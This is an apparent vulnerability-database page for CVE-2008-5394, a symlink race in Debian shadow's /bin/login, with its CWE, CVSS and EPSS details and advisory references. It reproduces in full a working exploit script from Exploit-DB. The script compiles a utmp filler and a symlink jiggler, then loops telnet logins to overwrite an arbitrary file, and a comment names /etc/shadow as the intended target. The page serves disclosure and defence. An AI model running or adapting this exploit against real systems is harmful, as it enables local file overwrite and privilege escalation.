CVE-2008-5394 : Detail

CVE-2008-5394

A01-Broken Access Control
0.04%V3
Local
2008-12-08
23h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

/bin/login in shadow 4.0.18.1 in Debian GNU/Linux, and probably other Linux distributions, allows local users in the utmp group to overwrite arbitrary files via a symlink attack on a temporary file referenced in a line (aka ut_line) field in a utmp entry.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 7313

Publication date : 2008-11-30 23h00 +00:00
Author : Paul Szabo
EDB Verified : Yes

#!/bin/bash - echo ' #include <string.h> #include <stdlib.h> #include <unistd.h> #include <utmp.h> #include <sys/types.h> #include <stdio.h> int main(int argc, char *argv[]) { struct utmp entry; int i; entry.ut_type=LOGIN_PROCESS; strcpy(entry.ut_line,"/tmp/x"); entry.ut_time=0; strcpy(entry.ut_user,"badguy"); strcpy(entry.ut_host,"badhost"); entry.ut_addr=0; for(i=1;i<9;i++) { entry.ut_pid=(pid_t)( i + (int)getpid() ); sprintf(entry.ut_id,"bad%d",i); pututline(&entry); } } ' > /tmp/fillutmp.c cc -o /tmp/fillutmp /tmp/fillutmp.c echo 'Ask someone with group utmp privileges to do:' echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' echo -n 'Press [RETURN] to continue... ' read ANS echo ' #include <unistd.h> int main(int argc, char *argv[]) { while(1) { unlink("/tmp/x"); symlink(argv[1],"/tmp/x"); unlink("/tmp/x"); symlink(argv[2],"/tmp/x"); } } ' > /tmp/jigglelnk.c cc -o /tmp/jigglelnk /tmp/jigglelnk.c HOST=`hostname` # or simply localhost? echo "Which tty do you think a 'telnet $HOST' will use next?" echo "(Do that telnet and see...)" read TTY echo "You said it will be '$TTY' ..." ATK=/etc/debian_version # should be /etc/shadow echo "Starting symlink re-jiggler ..." /tmp/jigglelnk $TTY $ATK & JIG=$! LOOP=0 while :; do ((LOOP = $LOOP + 1)) echo; echo; echo "Try = $LOOP" /tmp/fillutmp echo "Telnetting... if login succeeds, just exit for next try..." /usr/bin/telnet $HOST LS=`ls -ld $ATK` case "$LS" in *root*root* ) ;; # not done yet... * ) echo; echo echo "Success after $LOOP tries!" echo "$LS" echo; echo break ;; esac done kill $JIG rm /tmp/fillutmp /tmp/jigglelnk /tmp/x # ... # ~$ logout # Connection closed by foreign host. # Success after 12 tries! # -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version # milw0rm.com [2008-12-01]

Products Mentioned

Configuraton 0

Debian>>Shadow >> Version 4.0.18.1

References

http://osvdb.org/52200
Tags : vdb-entry, x_refsource_OSVDB
http://bugs.debian.org/505271
Tags : x_refsource_CONFIRM
http://www.securityfocus.com/bid/32552
Tags : vdb-entry, x_refsource_BID
http://bugs.debian.org/332198
Tags : x_refsource_CONFIRM
http://security.gentoo.org/glsa/glsa-200903-24.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://www.mandriva.com/security/advisories?name=MDVSA-2009:062
Tags : vendor-advisory, x_refsource_MANDRIVA
https://www.exploit-db.com/exploits/7313
Tags : exploit, x_refsource_EXPLOIT-DB
http://securityreason.com/securityalert/4695
Tags : third-party-advisory, x_refsource_SREASON
http://bugs.debian.org/505071
Tags : x_refsource_CONFIRM
http://www.ubuntu.com/usn/usn-695-1
Tags : vendor-advisory, x_refsource_UBUNTU